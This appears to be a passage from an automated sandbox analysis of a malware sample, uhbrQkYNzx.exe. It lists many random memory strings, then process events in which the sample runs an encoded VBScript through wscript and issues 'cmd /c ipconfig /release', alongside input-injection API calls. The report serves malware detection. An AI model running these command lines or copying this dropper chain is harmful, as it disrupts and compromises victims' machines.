                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7sf01k1571v20c9m005x955tq4z51x107a934memstr_4cbd6f99-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9nvu1a6rb2h2g952l41i7g5o4jwd6h8g26mmemstr_76490384-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2pxjf8mi47h9wzdz9v156xhi054pnpmemstr_be1480eb-1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zcilz4pd0v97pyk92j7nyr4283dq57607kzu28memstr_89b85277-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 22h01j4208q5q9n7xmemstr_a4e36dc9-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 79b5a3b8puhy4vzx03y5l9j337imemstr_69139a40-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '<\?+memstr_43bdd4d3-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4g530q37r76ld6a27t57103m42f633568y3t7ly0lndmemstr_e724cb90-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8&lyo]#vmemstr_6b4c6165-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1215174ano02w4memstr_8beee085-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .>|q%(memstr_a83952ae-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2sryp463hb2dw2x90tlpr5memstr_ab0a7a01-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zd7jms04wa7p6s23ar9t9vg9n2q3740636vdlpsmemstr_d50a8e77-8
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: juns625bmemstr_cdd99ee5-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gu6l8w4rvz9t4o38memstr_23fe208f-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d8m2ihfhcqj6srn7o24645z2memstr_76dab853-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wn8taw9q23nl2z55rtkr97vmemstr_5c6ee0f8-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <(zo,memstr_4d2331c0-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d1mtf6af53ckq95pk46xf5yoolm811281fh38mt873imemstr_d0a25d4c-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h38%ememstr_5f285368-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 57449vo5f31jo5vcmemstr_cf9578b9-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w112d9cefz5mhl1i1m326mp639dxlsefd6083vu8pw4lmemstr_b0463d0f-8
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7h05kqk947t7s538r46v40uh5p54sgl8hv5vj53q98303hmemstr_1395d25d-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?1"%[memstr_714fb890-c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 03i2705u27pi9v06lfmemstr_c6ef2981-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 873rx810q9pnl5c2g0jp0hdx7et5684qmemstr_a14d7bb4-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l379x22r7h2691882m3yvlq70y60f7y2l4afmemstr_0cd91144-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g62ru03658g344imemstr_f182017a-c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9gutxf816b4gpr1z74kfaw5m9ub5k6i0th81x9zu3cymemstr_00780ce7-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~bw#hmemstr_e2b79ba3-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2yc${memstr_b052bb2b-c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: odqw21c7w5gimemstr_98fc9495-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :lei/memstr_13428ac1-c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o1k1bf5zec9hz6s8w33jz9jmemstr_94c57574-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w2qyez575zfugr411mzji8emyumemstr_877c2c8c-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kcyqyfnxj586c8f78ih3mezamlq55memstr_a7a16f64-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fkro3jee3ibxa6fgr4due12mngfmemstr_5dcaeedb-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3ho62q6kn73oc9pzmemstr_24e75543-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d3r75bun3dbr9zj2zyd9uzj347u3b6m1fm618memstr_09fbca94-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z4t24pvy6951tumemstr_cfd41a7c-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zq&)memstr_c5c8336a-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^2~t'memstr_3a1c41d3-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 20exdf8wu2cghj19memstr_ac72efc8-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 229baf0v4da17t63u15kyur1973ovsmemstr_0aa27e32-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z3qdozs002h8bbezjuk5b9ovrwnq74065agkii73vmemstr_899e6e5f-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t1lgwx2eze630hq5g3846rv798m89206vcsv24memstr_facbc025-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1333j27y3hs33794d94217wwyg43q3g5770e6wsx4njc8b7memstr_503fa171-1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yo6d0m2memstr_d9b4044c-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n93591th0m1yo185r1t6ryup688xh9446y80ri7rt04hmemstr_a94e7455-1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4nj498i2e2yrg01xr90fmemstr_a713aefa-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 830s9k8n70qz59uhlmta69mggov6fwh1598mrr85if53memstr_6b9f6982-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #7|^?memstr_3d003cc2-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wdv/#memstr_dc62cdc5-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ed_ex{memstr_1c5ec16c-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u6o0ynac0joymemstr_dd72dc8f-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 55rjhnnm6a3t949ac9rsjh89t6kr5memstr_3dbd867f-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .%a0}memstr_102d2ade-c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 548b5ml018zmemstr_4611a7f5-c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o'(.qmemstr_61289b2e-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *rj}5memstr_df6caecc-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w9dm632r7938hvgq90kg42zgs2g45memstr_0628d406-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b;,=memstr_07d50c26-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6s95306s80oiii6tmbdc3833gac5ukum5k30asmemstr_80ada29d-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8d968a92vsfjk0l0jmemstr_4b3afe4e-1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9hegu6q46v7756409p580tp0xqgr79w5b6memstr_c52df098-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qkiis47une0zhmemstr_9b096e64-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 39u77e6104967417w7memstr_d2b2aec2-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1c05v7o488ngjej5ljh9t5j3g094k3285memstr_ad4bd407-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3y2o4997t788wjjjh8s23sys14kj778gyl81l050memstr_f6c61042-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: axp090hi84698m8j98zm1a36sxb1z9j6189okl1memstr_2167ce10-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1eo578tj4ll7c9ve86qjc056a04078046dmmemstr_b89983aa-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 671b676n586a9q23cxkkp14p4memstr_6dc232d0-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >2wr)memstr_738f689d-c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3wj8ivihpx05j62161a1d150m876eflmemstr_4909200b-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4195xof68sr333bmemstr_1045a10d-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8esv0774zm9gnhdm4wbd2wv5memstr_983119f7-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1hi79x76ftmxwl8memstr_1239a9dc-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xdd2p9i8lr86e9z95kmmemstr_b6f38a73-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vma~];rmemstr_8cdbc8d4-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g^k=v(vmemstr_f64ac363-1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 91b23cvv3o55k2za7n856zmemstr_42dfc2a2-c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 27i48q22f0k8r2h9510h9awe6s8vhp60q09237memstr_34d30726-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c3sg36q7q43c9t4h778xqxb2d4bbh5ura53g5r4memstr_eb8855dd-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p8rw2memstr_5ed243a8-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6v9dp4g606memstr_987f5dad-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dtfy,memstr_636d3404-c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j?5cvmemstr_60bb61b6-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;m{`pmemstr_b18ecd83-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2lky6i1760xa43tnmemstr_4fcbe1e6-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pkytanh2uv2vmc491xdi8ozpmz8e25693rmemstr_42d1273d-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0de42q3qspsq1fdqr5yahmemstr_65c15d2e-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gd'<*5memstr_6c89e050-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 790t91y6363pysci9538pja517cmemstr_344ae913-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mja8038k4sjc9i57fd45cx7718cwqpx076w8828e2r09l9qr02memstr_8169e16f-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~"m]llmemstr_ed6d0338-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 837vqo5641w1p7y60i8duq99l6aey5z467721m6tkb4ymemstr_179a2607-1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r6gr3z600hcriqbmemstr_6522bc00-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a.7%4*memstr_e59201ef-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2ssmq224ma862nv9imemstr_1d5e65c6-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1q1vmvmemstr_febc2c7b-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3eyxmptekqqn904mfj42219r1h7006zt310c1rwmemstr_89101887-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 69yupavuku96cw40x6diwfdc8w4h65c5esng3hb27k9z6ca98amemstr_1a7e1634-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z70309smemstr_dc8f4b17-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uvd80uip0umqfs83s562p94302amemstr_c6eac745-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k65vkttwty2uofb2iz186wuenm50x2h44fjm5memstr_28ec96c5-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qd3j53gy22t07zj577p31l7482czap6i8s94a4x2787z35memstr_e4226c74-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i91t4g6cjtyw5toh0f23918mv72857g4e277n784fmemstr_554f1ca9-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }zb\nmemstr_2edd468d-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3o#r!memstr_f58c5250-1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wtk<[jmemstr_987ecf13-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k60ovtey1nlw95nox3f07t098bmemstr_f409e102-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3767c8p692940jmxd0uu27agzc53897832u2snk1qm0hmemstr_2e03969d-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s867s5omemstr_0411fd9c-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6vk20008921ard61sl8je9ds8m3389g9srh5lu69pmemstr_afa67cda-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 19kj6i20uoh886fm6m4w86i7967284323qb7s5k25okz4s52memstr_396a4a49-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .*fjybmemstr_3853d28f-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x8l6k1it7o550031rs1rb9fa3v4l30uth3myti43memstr_bbb44b63-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2lu966w6cr0749j4jmq4417001821memstr_334f38e8-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l~?=lmemstr_b857384a-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !hpbzmemstr_dcd0f5a4-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1sggcdji07k3262j7ydq9r87f42v3m704memstr_88dac227-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: us6499jj7zk0ljfrg1k8p67v08reb6bz3t22p9ddb672memstr_7f696435-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oi\v|memstr_68135a79-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 41dj22lwl65r749564immemstr_6b29cffa-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sq2i6923dvdkg405q4lke40uqe3amemstr_9f65f4d4-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >-ipmemstr_933cbd41-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w824u31eeehyxkhuud929jk23r3g07q24h10v795ildc2l58fmemstr_e2e803b4-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j5j8q8dy62271gcpn40c92be074hkvvpye161x7gmemstr_d28fa4cf-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gj2qar3env0jpe6m2o44xe6tl234edt8904m47memstr_f13e8777-8
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 06pw5ch6r91uw8364memstr_a7f32914-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 03e363u9z6h0memstr_ccae471f-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l410s9ea3w40533o44496a45984x3g2ii085h9cd7n7v54c2memstr_f7ce604c-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: crxir9wsy71wcrrp6o554p34sf2memstr_0f39aaa7-1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5514s9qs4oa2g779dzb34x53pl9b04olutt4qdxp10sdc1zjmemstr_25a296ee-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rbw35a5g3mauhd22k67le28a4mt5noi0z4h2049vv5bmemstr_8d969c10-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i :w$memstr_a5183af9-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gjd[cgimemstr_4764d5ec-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9ub1ettr1hqy5ub1sbxflbdlv8080lp499s9o6599u2qh5jmemstr_a0a634ad-1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tw82r9wh91c9ht6nmemstr_1fcbbcad-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kw7kjc4eamemstr_f821df28-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0iyikjpr1memstr_40551c3a-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6f5520912qt578c7z91memstr_a3b75340-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .fr{fq~memstr_35aa6b5c-8
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inkx7memstr_3a3f05cc-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sv>m=ocmemstr_f1cedf15-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l65e2a36m08prq7ja8b3my2005memstr_74d4ee49-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %/0cmemstr_e40633a4-6
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CBBB02 SendInput,keybd_event,10_2_00CBBB02
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CBEBE5 mouse_event,10_2_00CBEBE5
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
